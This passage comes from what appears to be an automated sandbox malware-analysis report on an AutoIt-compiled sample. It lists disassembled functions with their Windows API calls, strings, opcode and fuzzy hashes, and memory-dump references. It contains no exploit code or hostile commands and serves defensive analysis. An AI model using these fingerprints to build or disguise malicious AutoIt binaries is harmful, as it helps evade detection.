                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                            • String ID: 0$@U=u
                                                            • API String ID: 1073566785-975001249
                                                            • Opcode ID: 2fe4ca5a37b65aa5b27502e1aac7cf2c5fe1639bf33023dcf1dae0ee4ec44139
                                                            • Instruction ID: b42b4f9d719d88c4cb649b1b70785eaf1c71f6d6a4fe65965b1d3ec67fe2c321
                                                            • Opcode Fuzzy Hash: 2fe4ca5a37b65aa5b27502e1aac7cf2c5fe1639bf33023dcf1dae0ee4ec44139
                                                            • Instruction Fuzzy Hash: 39E15D70900258EBDF209F54CC84EEE7BB9EF09712F148156FD55AA290DB708A88EF71
                                                            Function 00D5488F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetCursorPos.USER32(?), ref: 00D549CA
                                                            • GetDesktopWindow.USER32 ref: 00D549DF
                                                            • GetWindowRect.USER32(00000000), ref: 00D549E6
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00D54A48
                                                            • DestroyWindow.USER32(?), ref: 00D54A74
                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00D54A9D
                                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00D54ABB
                                                            • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00D54AE1
                                                            • SendMessageW.USER32(?,00000421,?,?), ref: 00D54AF6
                                                            • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00D54B09
                                                            • IsWindowVisible.USER32(?), ref: 00D54B29
                                                            • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00D54B44
                                                            • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00D54B58
                                                            • GetWindowRect.USER32(?,?), ref: 00D54B70
                                                            • MonitorFromPoint.USER32(?,?,00000002), ref: 00D54B96
                                                            • GetMonitorInfoW.USER32(00000000,?), ref: 00D54BB0
                                                            • CopyRect.USER32(?,?), ref: 00D54BC7
                                                            • SendMessageW.USER32(?,00000412,00000000), ref: 00D54C32
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                            • String ID: ($0$tooltips_class32
                                                            • API String ID: 698492251-4156429822
                                                            • Opcode ID: c66953ff41f985cd16d885c0936c9d25c992dd381cfefbaf162f395179fa6329
                                                            • Instruction ID: 302984e5a6f39d13ac2ee290b8377ccf90cca8059bc247e58d45368bd187c498
                                                            • Opcode Fuzzy Hash: c66953ff41f985cd16d885c0936c9d25c992dd381cfefbaf162f395179fa6329
                                                            • Instruction Fuzzy Hash: 06B18A70604340AFDB44DF64C849B6ABBE4FF88319F04891DFD999B2A1D770E849CB66
                                                            Function 00D3449A Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 179COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00D344AC
                                                            • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00D344D2
                                                            • _wcscpy.LIBCMT ref: 00D34500
                                                            • _wcscmp.LIBCMT ref: 00D3450B
                                                            • _wcscat.LIBCMT ref: 00D34521
                                                            • _wcsstr.LIBCMT ref: 00D3452C
                                                            • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00D34548
                                                            • _wcscat.LIBCMT ref: 00D34591
                                                            • _wcscat.LIBCMT ref: 00D34598
                                                            • _wcsncpy.LIBCMT ref: 00D345C3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                            • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                            • API String ID: 699586101-1459072770
                                                            • Opcode ID: fdf4ed863bef472cc1ed72c83d0e632c60f6c7e738a1be8f989f794338deaeb2
                                                            • Instruction ID: 633a4c50e931f9f636b937127480cf72d73a2b0ea6c8af110a771b424a4e1921
                                                            • Opcode Fuzzy Hash: fdf4ed863bef472cc1ed72c83d0e632c60f6c7e738a1be8f989f794338deaeb2
                                                            • Instruction Fuzzy Hash: 5E41F571A402087BDB50AB748C07EFF776CDF45710F54006AFA05E6182EB74AA05A6B6
                                                            Function 00CD27D9 Relevance: 35.3, APIs: 18, Strings: 2, Instructions: 286windowtimeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00CD28BC
                                                            • GetSystemMetrics.USER32(00000007), ref: 00CD28C4
                                                            • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00CD28EF
                                                            • GetSystemMetrics.USER32(00000008), ref: 00CD28F7
                                                            • GetSystemMetrics.USER32(00000004), ref: 00CD291C
                                                            • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00CD2939
                                                            • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00CD2949
                                                            • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00CD297C
                                                            • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00CD2990
                                                            • GetClientRect.USER32(00000000,000000FF), ref: 00CD29AE
                                                            • GetStockObject.GDI32(00000011), ref: 00CD29CA
                                                            • SendMessageW.USER32(00000000,00000030,00000000), ref: 00CD29D5
                                                              • Part of subcall function 00CD2344: GetCursorPos.USER32(?), ref: 00CD2357
                                                              • Part of subcall function 00CD2344: ScreenToClient.USER32(00D957B0,?), ref: 00CD2374
                                                              • Part of subcall function 00CD2344: GetAsyncKeyState.USER32(00000001), ref: 00CD2399
                                                              • Part of subcall function 00CD2344: GetAsyncKeyState.USER32(00000002), ref: 00CD23A7
                                                            • SetTimer.USER32(00000000,00000000,00000028,00CD1256), ref: 00CD29FC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                            • String ID: @U=u$AutoIt v3 GUI
                                                            • API String ID: 1458621304-2077007950
                                                            • Opcode ID: a0f3993bfaefa655e524fbca09ac6a57b228b7e1245aba887bff28b7a777f521
                                                            • Instruction ID: 4ffc3ef4af18d7843f5a235f3973599bc34711e5271dc53dd79ca41c6ddb1cfc
                                                            • Opcode Fuzzy Hash: a0f3993bfaefa655e524fbca09ac6a57b228b7e1245aba887bff28b7a777f521
                                                            • Instruction Fuzzy Hash: A1B13971A0030AEFDB15DFA8DC45BAA7BA5FB18311F10422AFA15EB390DB749941DB60
                                                            Function 00D5BA33 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 130filecommemoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 00D5BA56
                                                            • GetFileSize.KERNEL32(00000000,00000000), ref: 00D5BA6D
                                                            • GlobalAlloc.KERNEL32(00000002,00000000), ref: 00D5BA78
                                                            • CloseHandle.KERNEL32(00000000), ref: 00D5BA85
                                                            • GlobalLock.KERNEL32(00000000), ref: 00D5BA8E
                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00D5BA9D
                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00D5BAA6
                                                            • CloseHandle.KERNEL32(00000000), ref: 00D5BAAD
                                                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00D5BABE
                                                            • OleLoadPicture.OLEAUT32(?,00000000,00000000,00D62CAC,?), ref: 00D5BAD7
                                                            • GlobalFree.KERNEL32(00000000), ref: 00D5BAE7
                                                            • GetObjectW.GDI32(?,00000018,000000FF), ref: 00D5BB0B
                                                            • CopyImage.USER32(?,00000000,?,?,00002000), ref: 00D5BB36
                                                            • DeleteObject.GDI32(00000000), ref: 00D5BB5E
                                                            • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00D5BB74
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                            • String ID: @U=u
                                                            • API String ID: 3840717409-2594219639
                                                            • Opcode ID: a2a074a6187168df2658513e4aa75e7dcc83c91402b32790329708203ca4ef76
                                                            • Instruction ID: 9d685b216db9e4d510947079640c07246ddf445fb448bccfc392d92ffc19046a
                                                            • Opcode Fuzzy Hash: a2a074a6187168df2658513e4aa75e7dcc83c91402b32790329708203ca4ef76
                                                            • Instruction Fuzzy Hash: E2410775600308EFDB119F65DC88EABBBB9EB89722F144069FD19DB260D7709905CB70
                                                            Function 00D2A439 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetClassNameW.USER32(?,?,00000100), ref: 00D2A47A
                                                            • __swprintf.LIBCMT ref: 00D2A51B
                                                            • _wcscmp.LIBCMT ref: 00D2A52E
                                                            • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00D2A583
                                                            • _wcscmp.LIBCMT ref: 00D2A5BF
                                                            • GetClassNameW.USER32(?,?,00000400), ref: 00D2A5F6
                                                            • GetDlgCtrlID.USER32(?), ref: 00D2A648
                                                            • GetWindowRect.USER32(?,?), ref: 00D2A67E
                                                            • GetParent.USER32(?), ref: 00D2A69C
                                                            • ScreenToClient.USER32(00000000), ref: 00D2A6A3
                                                            • GetClassNameW.USER32(?,?,00000100), ref: 00D2A71D
                                                            • _wcscmp.LIBCMT ref: 00D2A731
                                                            • GetWindowTextW.USER32(?,?,00000400), ref: 00D2A757
                                                            • _wcscmp.LIBCMT ref: 00D2A76B
                                                              • Part of subcall function 00CF362C: _iswctype.LIBCMT ref: 00CF3634
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                            • String ID: %s%u
                                                            • API String ID: 3744389584-679674701
                                                            • Opcode ID: b83050bb018056880c1dc4e99069d2f21086cde9ba60f39df4633a1ee72bdc8e
                                                            • Instruction ID: 420034f1b2a35c36e1730eef62660789c055c43503cf3048d58e8823c6fd4735
                                                            • Opcode Fuzzy Hash: b83050bb018056880c1dc4e99069d2f21086cde9ba60f39df4633a1ee72bdc8e
                                                            • Instruction Fuzzy Hash: 3EA1EF31204726AFC714DF68D884BAAB7E8FF64309F048529F999C7190DB30E945CBB2
                                                            Function 00D2AED4 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetClassNameW.USER32(00000008,?,00000400), ref: 00D2AF18
                                                            • _wcscmp.LIBCMT ref: 00D2AF29
                                                            • GetWindowTextW.USER32(00000001,?,00000400), ref: 00D2AF51
                                                            • CharUpperBuffW.USER32(?,00000000), ref: 00D2AF6E
                                                            • _wcscmp.LIBCMT ref: 00D2AF8C
                                                            • _wcsstr.LIBCMT ref: 00D2AF9D
                                                            • GetClassNameW.USER32(00000018,?,00000400), ref: 00D2AFD5
                                                            • _wcscmp.LIBCMT ref: 00D2AFE5
                                                            • GetWindowTextW.USER32(00000002,?,00000400), ref: 00D2B00C
                                                            • GetClassNameW.USER32(00000018,?,00000400), ref: 00D2B055
                                                            • _wcscmp.LIBCMT ref: 00D2B065
                                                            • GetClassNameW.USER32(00000010,?,00000400), ref: 00D2B08D
                                                            • GetWindowRect.USER32(00000004,?), ref: 00D2B0F6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                            • String ID: @$ThumbnailClass
                                                            • API String ID: 1788623398-1539354611
                                                            • Opcode ID: faaf1fb6da4cef7d11042b39c979314d30a77f9e75ad1404642cba01f096c317
                                                            • Instruction ID: dcccc543187134140001e7dc4bfa81dca2ba0c689806bbb0f7d3ce1caa9a0f25
                                                            • Opcode Fuzzy Hash: faaf1fb6da4cef7d11042b39c979314d30a77f9e75ad1404642cba01f096c317
                                                            • Instruction Fuzzy Hash: 8E81E0710083159FDB01DF14D985FAA77E8EFA4328F08846AFD858A095DB74DD49CBB2
                                                            Function 00D5A1B9 Relevance: 26.5, APIs: 12, Strings: 3, Instructions: 205windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _memset.LIBCMT ref: 00D5A259
                                                            • DestroyWindow.USER32(?,?), ref: 00D5A2D3
                                                              • Part of subcall function 00CD7BCC: _memmove.LIBCMT ref: 00CD7C06
                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00D5A34D
                                                            • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00D5A36F
                                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00D5A382
                                                            • DestroyWindow.USER32(00000000), ref: 00D5A3A4
                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00CD0000,00000000), ref: 00D5A3DB
                                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00D5A3F4
                                                            • GetDesktopWindow.USER32 ref: 00D5A40D
                                                            • GetWindowRect.USER32(00000000), ref: 00D5A414
                                                            • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00D5A42C
                                                            • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00D5A444
                                                              • Part of subcall function 00CD25DB: GetWindowLongW.USER32(?,000000EB), ref: 00CD25EC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                            • String ID: 0$@U=u$tooltips_class32
                                                            • API String ID: 1297703922-1130792468
                                                            • Opcode ID: 33417757c8ae6994f8ca6ea758d85061e27c2370c0cda27b2a0156977f6bf7d4
                                                            • Instruction ID: 88de6f8f47e48bf0fbe8dfe2566fe3eec808e0e44076a155465a430818d77d31
                                                            • Opcode Fuzzy Hash: 33417757c8ae6994f8ca6ea758d85061e27c2370c0cda27b2a0156977f6bf7d4
                                                            • Instruction Fuzzy Hash: 42715870140305AFDB25CF68CC49F6A7BE5EB88705F08462DFD858B2A0D771A90ACB62
                                                            Function 00D5C5FE Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 181windowfileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00CD2612: GetWindowLongW.USER32(?,000000EB), ref: 00CD2623
                                                            • DragQueryPoint.SHELL32(?,?), ref: 00D5C627
                                                              • Part of subcall function 00D5AB37: ClientToScreen.USER32(?,?), ref: 00D5AB60
                                                              • Part of subcall function 00D5AB37: GetWindowRect.USER32(?,?), ref: 00D5ABD6
                                                              • Part of subcall function 00D5AB37: PtInRect.USER32(?,?,00D5C014), ref: 00D5ABE6
                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 00D5C690
                                                            • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00D5C69B
                                                            • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00D5C6BE
                                                            • _wcscat.LIBCMT ref: 00D5C6EE
                                                            • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00D5C705
                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 00D5C71E
                                                            • SendMessageW.USER32(?,000000B1,?,?), ref: 00D5C735
                                                            • SendMessageW.USER32(?,000000B1,?,?), ref: 00D5C757
                                                            • DragFinish.SHELL32(?), ref: 00D5C75E
                                                            • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00D5C851
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                            • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$@U=u
                                                            • API String ID: 169749273-762882726
                                                            • Opcode ID: 2ff4f9d489c5107e74a37e1831a55be84d3dfec3801d19e19e49351ba2d899a6
                                                            • Instruction ID: a263931741c2cb02582a146b93b240d168e2c46592398981886511a4a422936b
                                                            • Opcode Fuzzy Hash: 2ff4f9d489c5107e74a37e1831a55be84d3dfec3801d19e19e49351ba2d899a6
                                                            • Instruction Fuzzy Hash: F4616271108300AFCB01EF54DC85DAFBBF8EF89751F00092EFA95962A1DB719949DB62
                                                            Function 00D2ABD4 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: __wcsnicmp
                                                            • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                            • API String ID: 1038674560-1810252412
                                                            • Opcode ID: 5c90ef5e9e294ab1f3cdbba565566f198465ab2c7cbc239f9309b2719a667b67
                                                            • Instruction ID: 60200c40e00b98cbc2cc70ff3bc37bca7bcfed385b1258337e5fb5323994a7fa
                                                            • Opcode Fuzzy Hash: 5c90ef5e9e294ab1f3cdbba565566f198465ab2c7cbc239f9309b2719a667b67
                                                            • Instruction Fuzzy Hash: 2E31E434948219ABCA14FB64EE43EBE7764EF20754F30011AF555711D1FF21AF08A6B2
                                                            Function 00D44FFD Relevance: 25.6, APIs: 17, Instructions: 110COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadCursorW.USER32(00000000,00007F8A), ref: 00D45013
                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 00D4501E
                                                            • LoadCursorW.USER32(00000000,00007F03), ref: 00D45029
                                                            • LoadCursorW.USER32(00000000,00007F8B), ref: 00D45034
                                                            • LoadCursorW.USER32(00000000,00007F01), ref: 00D4503F
                                                            • LoadCursorW.USER32(00000000,00007F81), ref: 00D4504A
                                                            • LoadCursorW.USER32(00000000,00007F88), ref: 00D45055
                                                            • LoadCursorW.USER32(00000000,00007F80), ref: 00D45060
                                                            • LoadCursorW.USER32(00000000,00007F86), ref: 00D4506B
                                                            • LoadCursorW.USER32(00000000,00007F83), ref: 00D45076
                                                            • LoadCursorW.USER32(00000000,00007F85), ref: 00D45081
                                                            • LoadCursorW.USER32(00000000,00007F82), ref: 00D4508C
                                                            • LoadCursorW.USER32(00000000,00007F84), ref: 00D45097
                                                            • LoadCursorW.USER32(00000000,00007F04), ref: 00D450A2
                                                            • LoadCursorW.USER32(00000000,00007F02), ref: 00D450AD
                                                            • LoadCursorW.USER32(00000000,00007F89), ref: 00D450B8
                                                            • GetCursorInfo.USER32(?), ref: 00D450C8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Cursor$Load$Info
                                                            • String ID:
                                                            • API String ID: 2577412497-0
                                                            • Opcode ID: 0b8ab394bd76c5f341b431b387eff3ff7311a7ec5871a78a02f9057dfad7f24a
                                                            • Instruction ID: cf1a7b2b66ba0a8a2588edcc6b638a9a57c9cf8ba01f641d146ad773d0efe2cf
                                                            • Opcode Fuzzy Hash: 0b8ab394bd76c5f341b431b387eff3ff7311a7ec5871a78a02f9057dfad7f24a
                                                            • Instruction Fuzzy Hash: 9531F2B1D483196BDF109FB69C8996FBFE8FF08750F50452AA50DE7281DA78A5008FA1
                                                            Function 00D54392 Relevance: 24.8, APIs: 2, Strings: 12, Instructions: 251windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CharUpperBuffW.USER32(?,?), ref: 00D54424
                                                            • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00D5446F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
